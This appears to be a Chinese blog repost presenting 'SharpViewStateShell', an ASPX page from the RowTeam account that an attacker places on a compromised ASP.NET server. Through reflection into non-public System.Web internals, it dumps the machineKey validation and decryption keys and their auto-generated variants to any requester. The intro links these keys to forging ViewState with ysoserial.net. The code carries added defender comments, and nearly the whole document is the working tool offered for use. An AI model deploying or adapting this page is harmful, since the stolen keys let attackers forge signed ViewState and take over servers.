SharpViewStateShell v1.0.2



只要知道 ASP.NET 中 ViewState 使用的 ValidationKey 和 ValidationAlg,就可以根据其反序列化函数中的校验逻辑,从 ysoserial.net 中提取对应的签名过程。因此,machineKey 一旦泄露,防守方应视为 ViewState 的完整性保护已经失效,并立即轮换密钥。

获取 ValidationKey 和 ValidationAlg(以及 DecryptionKey、DecryptionAlg)的脚本如下:

<%@ Import Namespace="System.Diagnostics" %><%@ Import Namespace="System.IO" %><script runat="server" language="c#" CODEPAGE="65001">
/// <summary>
/// Writes the application's ASP.NET machineKey material to the HTTP response:
/// the configured validation/decryption keys and algorithms, the key material
/// returned by the non-public MachineKeyMasterKeyProvider, and the auto-generated
/// keys held in HttpRuntime together with their per-application variants.
/// </summary>
/// <remarks>
/// Defender note: whoever holds these values can sign ViewState that the
/// application will accept (the surrounding article states this for the
/// validation key and algorithm). If a page like this is found on a server,
/// treat the machineKey as compromised: rotate it on every node that shares it
/// and investigate how the file was placed there. Reflection from page code into
/// the non-public members named below is not something ordinary applications do
/// and is a reasonable hunting signal in web-root content.
/// Nothing written here is HTML-encoded before it reaches Response.Write.
/// </remarks>
public void GetAutoMachineKeys() {
    // Reads the "Version" value of the .NET Framework v4 "Full" setup key.
    // NOTE(review): the third argument of Registry.GetValue is the default value
    // returned when the value name is missing, not a value kind, so the enum
    // member passed here is what comes back in that case. The backslashes in the
    // literal are unescaped as rendered on this page (likely lost in extraction).
    var netVersion = Microsoft.Win32.Registry.GetValue("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full\", "Version", Microsoft.Win32.RegistryValueKind.ExpandString);
    if(netVersion!=null) Response.Write("<b>NetVersion: </b>" + netVersion);
    Response.Write("<br/><hr/>");

    // ==========================================================================
    // Section 1: machineKey settings as seen by the running application.
    // System.Web is loaded by its full 4.0.0.0 name so that the non-public static
    // MachineKeySection.GetApplicationConfig can be located and invoked by
    // reflection; its result is cast to MachineKeySection.
    var systemWebAsm = System.Reflection.Assembly.Load("System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a");
    var machineKeySectionType = systemWebAsm.GetType("System.Web.Configuration.MachineKeySection");
    var getApplicationConfigMethod = machineKeySectionType.GetMethod("GetApplicationConfig", System.Reflection.BindingFlags.Static | System.Reflection.BindingFlags.NonPublic);
    var config = (System.Web.Configuration.MachineKeySection)getApplicationConfigMethod.Invoke(null, new object[0]);
    // Values are printed as the section exposes them.
    // NOTE(review): presumably the configured strings, which may be an
    // auto-generate setting rather than key bytes; confirm against web.config.
    Response.Write("<b>ValidationKey:</b> "+config.ValidationKey);
    Response.Write("<br/>");
    Response.Write("<b>ValidationAlg:</b> "+ config.Validation);
    Response.Write("<br/>");
    Response.Write("<b>DecryptionKey:</b> "+ config.DecryptionKey);
    Response.Write("<br/>");
    Response.Write("<b>DecryptionAlg:</b> "+ config.Decryption);
    Response.Write("<br/>");
    Response.Write("<b>CompatibilityMode:</b> "+config.CompatibilityMode);
    Response.Write("<br/><hr/>");

    // ==========================================================================
    // Section 2: key material from MachineKeyMasterKeyProvider. The type is
    // instantiated through a non-public constructor with the config section and
    // four null arguments; GetValidationKey/GetEncryptionKey return key objects
    // whose GetKeyMaterial method yields the raw bytes.
    var typeMachineKeyMasterKeyProvider = systemWebAsm.GetType("System.Web.Security.Cryptography.MachineKeyMasterKeyProvider");
    var instance = typeMachineKeyMasterKeyProvider.Assembly.CreateInstance(
        typeMachineKeyMasterKeyProvider.FullName,
        false,
        System.Reflection.BindingFlags.Instance | System.Reflection.BindingFlags.NonPublic,
        null,
        new object[] { config, null, null, null, null },
        null,
        null);
    var validationKey = typeMachineKeyMasterKeyProvider.GetMethod("GetValidationKey").Invoke(instance, new object[0]);
    byte[] _validationKey = (byte[])validationKey.GetType().GetMethod("GetKeyMaterial").Invoke(validationKey, new object[0]);
    var encryptionKey = typeMachineKeyMasterKeyProvider.GetMethod("GetEncryptionKey").Invoke(instance, new object[0]);
    // NOTE(review): GetKeyMaterial is looked up on validationKey's runtime type
    // but invoked on encryptionKey; this assumes both objects share that type.
    byte[] _decryptionKey = (byte[])validationKey.GetType().GetMethod("GetKeyMaterial").Invoke(encryptionKey, new object[0]);

    // ==========================================================================
    // Section 3: auto-generated keys, printed under "ASP.NET 4.0 and below".
    Response.Write("<br/><b>ASP.NET 4.0 and below:</b><br/>");
    // The private static HttpRuntime.s_autogenKeys buffer is split by offset:
    // the first 64 bytes are taken as the validation key, the next 24 as the
    // decryption key.
    byte[] autogenKeys = (byte[])typeof(HttpRuntime).GetField("s_autogenKeys", System.Reflection.BindingFlags.NonPublic | System.Reflection.BindingFlags.Static).GetValue(null);
    int validationKeySize = 64;
    int decryptionKeySize = 24;
    byte[] validationKeyAuto = new byte[validationKeySize];
    byte[] decryptionKeyAuto = new byte[decryptionKeySize];
    System.Buffer.BlockCopy(autogenKeys, 0, validationKeyAuto, 0, validationKeySize);
    System.Buffer.BlockCopy(autogenKeys, validationKeySize, decryptionKeyAuto, 0, decryptionKeySize);
    string appName = HttpRuntime.AppDomainAppVirtualPath;
    string appId = HttpRuntime.AppDomainAppId;
    Response.Write("<br/>");
    Response.Write("<b>appName:</b> "+appName);
    Response.Write("<br/>");
    Response.Write("<b>appId:</b> "+appId);
    Response.Write("<br/>");
    Response.Write("<b>initial validationKey (not useful for direct use):</b> ");
    Response.Write(BitConverter.ToString(validationKeyAuto).Replace("-", string.Empty));
    Response.Write("<br/>");
    Response.Write("<b>initial decryptionKey (not useful for direct use):</b> ");
    Response.Write(BitConverter.ToString(decryptionKeyAuto).Replace("-", string.Empty));
    Response.Write("<br/>");

    // Per-application validation key: bytes 0..3 of a copy are overwritten with
    // the case-insensitive invariant-culture hash code of the virtual path,
    // low byte first. The 0xff000000 mask is a uint literal, so that operand pair
    // is widened to long and the shift by 24 does not sign-extend.
    byte[] _validationKeyAutoAppSpecific = validationKeyAuto.ToArray();
    int dwCode3 = StringComparer.InvariantCultureIgnoreCase.GetHashCode(appName);
    _validationKeyAutoAppSpecific[0] = (byte)(dwCode3 & 0xff);
    _validationKeyAutoAppSpecific[1] = (byte)((dwCode3 & 0xff00) >> 8);
    _validationKeyAutoAppSpecific[2] = (byte)((dwCode3 & 0xff0000) >> 16);
    _validationKeyAutoAppSpecific[3] = (byte)((dwCode3 & 0xff000000) >> 24);
    Response.Write("<b>App specific ValidationKey (when uses IsolateApps):</b> ");
    Response.Write(BitConverter.ToString(_validationKeyAutoAppSpecific).Replace("-", string.Empty));
    Response.Write("<br/>");

    // Per-AppId validation key: same scheme, but the hash of the application id
    // is written into bytes 4..7 of a fresh copy.
    byte[] _validationKeyAutoAppIdSpecific = validationKeyAuto.ToArray();
    int dwCode4 = StringComparer.InvariantCultureIgnoreCase.GetHashCode(appId);
    _validationKeyAutoAppIdSpecific[4] = (byte)(dwCode4 & 0xff);
    _validationKeyAutoAppIdSpecific[5] = (byte)((dwCode4 & 0xff00) >> 8);
    _validationKeyAutoAppIdSpecific[6] = (byte)((dwCode4 & 0xff0000) >> 16);
    _validationKeyAutoAppIdSpecific[7] = (byte)((dwCode4 & 0xff000000) >> 24);
    Response.Write("<b>AppId Auto specific ValidationKey (when uses IsolateByAppId):</b> ");
    Response.Write(BitConverter.ToString(_validationKeyAutoAppIdSpecific).Replace("-", string.Empty));
    Response.Write("<br/>");

    // Per-application decryption key: bytes 0..3 replaced with the virtual-path
    // hash computed above (dwCode3).
    byte[] _decryptionKeyAutoAutoAppSpecific = decryptionKeyAuto.ToArray();
    _decryptionKeyAutoAutoAppSpecific[0] = (byte)(dwCode3 & 0xff);
    _decryptionKeyAutoAutoAppSpecific[1] = (byte)((dwCode3 & 0xff00) >> 8);
    _decryptionKeyAutoAutoAppSpecific[2] = (byte)((dwCode3 & 0xff0000) >> 16);
    _decryptionKeyAutoAutoAppSpecific[3] = (byte)((dwCode3 & 0xff000000) >> 24);
    Response.Write("<b>App specific DecryptionKey (when uses IsolateApps):</b> ");
    Response.Write(BitConverter.ToString(_decryptionKeyAutoAutoAppSpecific).Replace("-", string.Empty));
    Response.Write("<br/>");

    // Per-AppId decryption key: bytes 4..7 replaced with the application-id hash
    // computed above (dwCode4).
    byte[] _decryptionKeyAutoAutoAppIdSpecific = decryptionKeyAuto.ToArray();
    _decryptionKeyAutoAutoAppIdSpecific[4] = (byte)(dwCode4 & 0xff);
    _decryptionKeyAutoAutoAppIdSpecific[5] = (byte)((dwCode4 & 0xff00) >> 8);
    _decryptionKeyAutoAutoAppIdSpecific[6] = (byte)((dwCode4 & 0xff0000) >> 16);
    _decryptionKeyAutoAutoAppIdSpecific[7] = (byte)((dwCode4 & 0xff000000) >> 24);
    Response.Write("<b>AppId Auto specific DecryptionKey (when uses IsolateByAppId):</b> ");
    Response.Write(BitConverter.ToString(_decryptionKeyAutoAutoAppIdSpecific).Replace("-", string.Empty));
    Response.Write("<br/><hr/>");

    // ==========================================================================
    // Section 4: the provider-returned key material from section 2, printed as
    // hex under the "ASP.NET 4.5 and above" heading next to the configured
    // algorithm names.
    Response.Write("<br/><b>ASP.NET 4.5 and above:</b><br/>");
    Response.Write("<br/>");
    Response.Write("<b>validationAlg:</b> "+config.Validation);
    Response.Write("<br/>");
    Response.Write("<b>validationKey:</b> "+BitConverter.ToString(_validationKey).Replace("-", string.Empty));
    Response.Write("<br/>");
    Response.Write("<b>decryptionAlg:</b> "+config.Decryption);
    Response.Write("<br/>");
    Response.Write("<b>decryptionKey:</b> "+BitConverter.ToString(_decryptionKey).Replace("-", string.Empty));
    Response.Write("<br/><hr/>");
}
/// <summary>
/// Page entry point: sets the response encoding, writes a banner, then calls
/// GetAutoMachineKeys to print the key material.
/// </summary>
/// <remarks>
/// Defender note: no authentication or authorization check is visible before the
/// keys are written, so any client able to request this page receives them.
/// </remarks>
public void Page_load() {
    // Uses the server's default ANSI code page for the response body.
    Response.ContentEncoding = System.Text.Encoding.Default;
    // Banner text (Chinese): title "Get the .NET framework machine keys";
    // 1. for lab study of ASP.NET ViewState only, do not misuse;
    // 2. applicable once privileges on the .NET framework have been obtained;
    // 3. the author's WeChat public account name.
    Response.Write("<p style='color:#ff0000;text-align:center;'>获取 .NET 框架的机器密钥</p>");
    Response.Write("<p>1. 本程序仅供实验学习 ASP.NET ViewState,请勿违法滥用!</p>");
    Response.Write("<p>2. 适用场景:获取 .NET 框架权限后均适用!</p>");
    Response.Write("<p>3. 公众号:RowTeam</p>");
    Response.Write("<br/><hr/>");
    GetAutoMachineKeys();
}
</script>


全程只靠图。


SharpViewStateShell v1.0.2



效果如下所示:


SharpViewStateShell v1.0.2






原文始发于微信公众号(RowTeam):SharpViewStateShell v1.0.2

版权声明:admin 发表于 2022年12月14日 下午12:22。
转载请注明:SharpViewStateShell v1.0.2 | CTF导航
